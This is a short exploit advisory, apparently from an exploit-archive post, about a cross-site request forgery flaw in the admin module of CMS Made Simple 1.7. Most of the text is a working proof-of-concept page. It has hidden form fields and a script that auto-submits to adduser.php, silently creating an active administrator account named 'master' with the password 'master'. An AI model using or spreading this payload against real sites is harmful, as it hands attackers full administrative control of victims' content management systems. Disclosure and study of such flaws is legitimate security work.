=======================================================================
CMS Made Simple 1.7 CSRF Vulnerability
=======================================================================# Vulnerability found in- Admin module# email Pratulag@yahoo.com# company aksitservices# Credit by Pratul Agrawal# SoftwareCMS Made Simple 1.7# Category CMS / Portals# Site p4ge http://server/demo/2/10/CMS_Made_Simple# Plateform php# Greetz to Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun, sameer (My Web Team)#Proof of concept #
Targeted URL:http://sever/demo/2/10/CMS_Made_Simple
Script to Add admin user through Cross Site request forgery
.................................................................................................................<html><body><form name="csrf" action="http://server/cmsmadesimple/admin/adduser.php" method="post"><inputtype=hidden name="sp_" value="64becc90"><inputtype=hidden name="user" value="master"><inputtype=hidden name="password" value="master"><inputtype=hidden name="passwordagain" value="master"><inputtype=hidden name="firstname" value="12345"><inputtype=hidden name="lastname" value="12345"><inputtype=hidden name="email" value="aa@aa.com"><inputtype=hidden name="active" value="on"><inputtype=hidden name="groups" value="1"><inputtype=hidden name="g1" value="1"><inputtype=hidden name="adduser" value="true"></form><script>
document.csrf.submit();</script></body></html>...................................................................................................................
After execution just refresh the page and we can see that the admin user added automatically.#If you have any questions, comments, or concerns, feel free to contact me.
